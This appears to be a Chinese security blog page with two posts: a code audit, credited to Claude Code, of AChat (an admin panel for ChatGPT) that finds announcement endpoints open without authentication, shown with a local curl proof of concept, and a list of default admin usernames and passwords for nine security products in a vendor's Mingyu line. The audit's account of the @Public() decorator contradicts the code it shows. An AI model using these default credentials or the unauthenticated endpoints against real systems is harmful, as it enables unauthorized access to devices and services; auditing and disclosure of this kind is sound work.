AChat 代码审计By Claude Code

Thu, 09 Apr 2026 10:30:00 +0800

对 AChat（一个 ChatGPT 管理后台）进行了一次完整的安全审计，记录已确认的漏洞。

项目技术栈是 NestJS + Fastify + Prisma，用的是 JWT 认证，结构比较清晰。

公告接口未授权访问

审计过程中，首先梳理了全局的路由配置和认证标记。

// auth.guard.ts - 全局认证 Guard
@Public()
@Controller()
export class AppController {
 @Get('/health')
 health() { ... }

 @Post('/announcement')
 async newAnnouncement(@Body() data: any) {
 return { success: true, data: await this.appService.upsertAnnouncement({ ...data }) };
 }

 @Delete('/announcement/:id')
 async deleteAnnouncement(@Param('id') id: number) {
 await this.appService.deleteAnnouncement(id);
 return { success: true };
 }
}

/announcement 的 POST 和 DELETE 方法均未添加 @Public() 或 @Roles(Role.Admin) 装饰器，理论上需要 JWT 认证且要求管理员权限。

实测验证：

curl -X POST 'http://localhost:3001/api/announcement' \
 -H 'Content-Type: application/json' \
 -d '{"title": "test", "content": "hacked"}'

# HTTP 200
# { "success": true, "data": { "id": 1, ... } }

无需任何认证即可创建公告。删除接口同样可被未授权访问。

安H产品默认账号密码整理

Thu, 22 Jan 2026 22:40:00 +0800

安H全系列产品默认账号密码整理：

1、明御运维审计与风险控制系统

版本：V2.0R25C10

Web服务：admin/sysAdm@169+-

2、明御Web应用防火墙

版本：V3.0R05

Web服务：admin/w2A)0*Fzs!9*(

3、明御数据库审计与风险控制系统

版本：V4.0R75

Web服务：admin、system、audit/s^2~wsMm@2024
控制台：admin/Dbapp@2013

4、明御®安全网关

版本：V3.0-5.3

Web服务：admin/adminadmin

5、明御APT攻击预警平台

版本：V2.0R79

Web服务：admin/Dbapp@2014
串口登录：admin/Dbapp@2014

6、明御®综合日志审计分析平台

版本：V3.0

Web服务：admin/RzSj6@8Ha!

7、明御终端安全及防病毒系统

版本：EDR-V3.12

Web服务：admin/GCNpec314!

8、智能设备管理中心

版本：V6R01C01

Web服务：admin/admin

9、明御入侵检测系统

版本：V2.0R79

Web服务：admin/Dbapp@2014
串口登录：admin/Dbapp@2014

网络安全 on 嘴强黑客 /pbuff07

AChat 代码审计By Claude Code

公告接口未授权访问

安H产品默认账号密码整理